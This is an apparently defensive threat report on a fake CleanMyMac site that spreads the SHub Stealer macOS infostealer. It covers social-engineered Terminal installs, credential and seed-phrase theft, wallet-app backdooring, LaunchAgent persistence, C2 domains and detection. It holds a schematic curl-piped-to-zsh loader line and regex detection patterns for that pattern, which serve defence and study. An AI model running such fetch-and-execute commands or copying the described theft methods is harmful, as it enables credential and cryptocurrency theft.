A new malware campaign targeting macOS users has been uncovered in which attackers impersonate the popular system utility CleanMyMac to distribute an infostealer called SHub Stealer. Instead of exploiting vulnerabilities, the attackers rely on social engineering—convincing users to paste a command into Terminal that downloads and executes malicious code.
This campaign demonstrates how macOS threats are evolving: attackers are increasingly using credential theft, wallet backdooring, and persistence mechanisms rather than traditional malware techniques.
Campaign Overview
The attack begins with a fraudulent website hosted at:
cleanmymacos[.]org
The site closely mimics the official CleanMyMac product page, making it difficult for users to distinguish it from the legitimate site. Victims are presented with what appears to be an advanced installation method, instructing them to open Terminal and paste a command to install the application.
This is a classic example of ClickFix-style delivery, where attackers trick users into executing malicious commands themselves rather than exploiting a system vulnerability.
Because the user voluntarily executes the command, macOS security controls such as Gatekeeper, notarization checks, and XProtect provide limited protection once the command is run.
Initial Infection Chain
The Terminal command used in the attack performs several steps in sequence:
- Displays a fake reference to the official CleanMyMac site to make the output look legitimate.
- Decodes a Base64-encoded URL that hides the true download location.
- Downloads a shell script from an attacker-controlled server.
- Pipes the script directly into zsh, executing it immediately.
Example behavior (schematic, not the literal command):

```
echo "macOS-CleanMyMac-App: https://macpaw.com/cleanmymac/us/app"
decode_base64_url
curl malicious_script | zsh
```
From the victim’s perspective, nothing unusual appears to happen during execution.
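As an added defender-side example (not code from the original write-up), the heuristics below flag the pattern described above in process-command-line telemetry or shell history: a download tool piped into an interpreter, a Base64 decode used to hide the real URL, and the recovered URL itself. The sample command lines are constructed; the hidden URL is a placeholder.

```python
import base64
import re

# Heuristics for the ClickFix pattern above: a download tool whose output is
# piped straight into an interpreter, plus a Base64 decode used to hide the
# real URL. Intended for process-command-line telemetry or shell history.
PIPE_TO_SHELL = re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:sudo\s+)?(?:zsh|bash|sh)\b")
B64_DECODE = re.compile(r"\bbase64\b[^|;]*(?:-d|-D|--decode)\b")
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_hidden_urls(cmdline):
    """Return URLs recovered from Base64 tokens embedded in the command line."""
    urls = []
    for token in B64_TOKEN.findall(cmdline):
        try:
            text = base64.b64decode(token, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):  # not valid Base64 / not text
            continue
        if text.startswith(("http://", "https://")):
            urls.append(text)
    return urls


def analyze_cmdline(cmdline):
    """Classify one command line; only download-piped-to-shell raises an alert."""
    pipe = bool(PIPE_TO_SHELL.search(cmdline))
    decode = bool(B64_DECODE.search(cmdline))
    urls = decode_hidden_urls(cmdline)
    if pipe and (decode or urls):
        severity = "high"      # download plus hidden URL: the campaign's signature
    elif pipe:
        severity = "medium"    # curl | sh without obfuscation
    else:
        severity = "none"
    return {"pipe_to_shell": pipe, "base64_decode": decode,
            "hidden_urls": urls, "severity": severity}


# Constructed samples (not real telemetry). The first mimics the campaign's
# Terminal one-liner with a placeholder URL hidden in Base64.
_HIDDEN = base64.b64encode(b"https://example.invalid/install.sh").decode()
SAMPLE_CMDLINES = [
    'echo "macOS-CleanMyMac-App: https://macpaw.com/cleanmymac/us/app"; '
    f'curl -fsSL "$(echo {_HIDDEN} | base64 -d)" | zsh',
    "curl -fsSL -o cleanmymac.dmg https://macpaw.com/download/cleanmymac",
    "echo aGVsbG8gd29ybGQ= | base64 -d",
]
```

Run `analyze_cmdline` over each line of `~/.zsh_history` or over EDR process-start events; the decoded URL gives the blocklist entry that the obfuscated command line does not.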
Loader Stage and Geofencing
The downloaded shell script acts as a loader, which performs reconnaissance before deploying the main malware payload.
One of the first checks examines macOS keyboard settings to determine whether a Russian-language keyboard is installed. If detected, the malware sends a cis_blocked event to the command-and-control (C2) server and exits.
This geofencing behavior is common among malware developed in Russian-speaking cybercrime ecosystems. By avoiding systems in CIS countries, attackers reduce the risk of attracting attention from local authorities.
If the system passes the check, the loader sends a device profile to the C2 server:
- External IP address
- Hostname
- macOS version
- Keyboard locale
Each infected system is also tagged with a 32-character build hash, allowing attackers to track victims and campaigns individually.
Deployment of the AppleScript Payload
After profiling the system, the loader retrieves the main payload, an AppleScript hosted on the attacker’s infrastructure.
AppleScript is a built-in macOS automation language that allows programs to interact with system UI elements and applications. The malware leverages this legitimate feature to carry out several malicious actions.
The first step performed by the AppleScript is to close the Terminal window, hiding evidence of the infection process.
Credential Harvesting via Fake System Prompt
Next, the malware displays a dialog box designed to mimic a legitimate macOS system prompt.
The message reads:
Required Application Helper.
Please enter password for continue.
The prompt uses Apple’s padlock icon and “System Preferences” title to appear authentic. If the victim enters their password, the malware captures the macOS login credentials.
This password can then be used to unlock sensitive data stored in the Apple Keychain.
Data Theft Capabilities
SHub Stealer is designed to collect a wide range of sensitive information from the infected system, including:
- Browser data from 14 Chromium-based browsers and Firefox
- Saved passwords and authentication tokens
- macOS Keychain contents
- Telegram session data
- Apple Notes databases
- Shell history files
- Cryptocurrency wallet files
All collected data is packaged into an archive and uploaded to attacker-controlled infrastructure.
Backdooring Cryptocurrency Wallets
One of the most dangerous aspects of SHub Stealer is its ability to modify cryptocurrency wallet applications.
The malware specifically targets Electron-based wallets such as:
- Exodus
- Atomic Wallet
- Ledger Wallet
- Ledger Live
- Trezor Suite
Instead of simply stealing existing wallet data, the malware replaces application components (such as app.asar) to insert malicious logic.
Example Modifications
Ledger Wallet / Ledger Live
- TLS certificate validation is disabled.
- A fake wallet recovery wizard is injected.
- The wizard asks users to enter their seed phrase, which is then transmitted to the attacker’s server.
Trezor Suite
- Displays a fake “critical security update” overlay.
- Uses the application’s own BIP39 library to validate seed phrases before exfiltration.
These techniques allow attackers to steal recovery phrases, enabling them to fully control victims’ crypto assets.
Persistence Mechanism
To maintain access to infected systems, SHub Stealer installs a LaunchAgent:
~/Library/LaunchAgents/com.google.keystone.agent.plist
The name mimics Google’s Keystone updater, helping it blend in with legitimate system components.
The LaunchAgent executes a hidden update script every 60 seconds, allowing the attackers to:
- Receive commands from the C2 server
- Maintain persistence
- Update malware functionality
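The following triage script is an added example (not the campaign's code nor Google's) that applies the persistence indicators above to LaunchAgent plists: a Keystone-style label whose program lives outside the Keystone bundle, a shell interpreter running a hidden script, and a 60-second StartInterval. The sample plists are constructed; the hidden script path and the genuine Keystone install directory are assumptions.

```python
import os
import plistlib

# Google's real Keystone agent is installed under this directory in ~/Library
# (assumed from the updater's public layout); any Keystone-labelled agent
# pointing elsewhere is treated as masquerading.
KEYSTONE_LABEL = "com.google.keystone"
KEYSTONE_HOME = "/Library/Google/GoogleSoftwareUpdate/"
SHELLS = {"/bin/sh", "/bin/bash", "/bin/zsh", "/usr/bin/env"}

def triage_launch_agent(plist_bytes):
    """Return findings for one LaunchAgent plist; an empty list means nothing odd."""
    p = plistlib.loads(plist_bytes)
    findings = []
    label = str(p.get("Label", ""))
    args = [str(a) for a in p.get("ProgramArguments", [])] or [str(p.get("Program", ""))]
    if label.startswith(KEYSTONE_LABEL) and not any(KEYSTONE_HOME in a for a in args):
        findings.append("Keystone label but program is outside the Keystone bundle")
    if args[0] in SHELLS:
        findings.append(f"agent runs a script via {args[0]} instead of a binary")
    if any(part.startswith(".") for a in args for part in a.split("/")[1:]):
        findings.append("program path contains a hidden (dot-prefixed) component")
    interval = p.get("StartInterval")
    if isinstance(interval, int) and interval <= 60:
        findings.append(f"StartInterval {interval}s: beacon-like polling cadence")
    return findings

def scan_launch_agents(directory=os.path.expanduser("~/Library/LaunchAgents")):
    """Triage every .plist in a LaunchAgents directory -> {filename: findings}."""
    report = {}
    if not os.path.isdir(directory):
        return report
    for name in sorted(os.listdir(directory)):
        if name.endswith(".plist"):
            with open(os.path.join(directory, name), "rb") as fh:
                report[name] = triage_launch_agent(fh.read())
    return report

# Constructed sample plists (not from the campaign). The label and the
# 60-second interval follow the article; the hidden script path is assumed.
SUSPICIOUS_PLIST = plistlib.dumps({
    "Label": "com.google.keystone.agent",
    "ProgramArguments": ["/bin/zsh", "/Users/victim/Library/.update.sh"],
    "StartInterval": 60,
})
BENIGN_PLIST = plistlib.dumps({
    "Label": "com.google.keystone.agent",
    "ProgramArguments": ["/Users/victim/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/MacOS/GoogleSoftwareUpdateAgent"],
    "StartInterval": 3600,
})
```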
Command and Control Infrastructure
The campaign uses several domains for communication and data exfiltration:
res2erch-sl0ut[.]com
wallets-gate[.]io
These servers receive stolen data, manage infected hosts, and collect telemetry such as build identifiers and system profiles.
MITRE ATT&CK Mapping
The campaign maps to multiple MITRE ATT&CK techniques:
| Technique | Description |
|---|---|
| T1204 | User Execution (victim runs Terminal command) |
| T1059 | Command and scripting interpreter |
| T1547.001 | Persistence via LaunchAgent |
| T1071.001 | Web-based C2 communications |
| T1005 | Data collection from local system |
| T1555 | Credential theft from password stores |
| T1036 | Masquerading (fake Google Keystone agent) |
Why This Campaign Is Significant
This campaign highlights several important trends in macOS malware:
- Social engineering over exploitation: attackers rely on convincing users to execute commands themselves.
- Credential and crypto theft as the primary goal: modern macOS malware focuses heavily on monetization through stolen credentials and wallets.
- Use of legitimate system tools: AppleScript and LaunchAgents help attackers avoid detection.
- Application-level backdooring: instead of attacking the operating system, the malware modifies installed wallet applications.
How Users Can Protect Themselves
Users can reduce risk by following these best practices:
- Never paste commands into Terminal from untrusted websites.
- Download software only from official developer sites or the App Store.
- Be cautious of look-alike domains.
- Use reputable endpoint protection software.
- Monitor cryptocurrency wallets for suspicious activity.
Legitimate macOS applications almost never require Terminal commands for installation, making such instructions a strong indicator of malicious activity.
Conclusion
The fake CleanMyMac campaign demonstrates how attackers are refining macOS malware delivery techniques. By combining brand impersonation, social engineering, AppleScript automation, and wallet backdooring, the SHub Stealer campaign represents a sophisticated and financially motivated threat.
As macOS adoption continues to grow, attackers are clearly investing more effort into developing macOS-specific infostealers, making awareness and secure software distribution practices more important than ever.
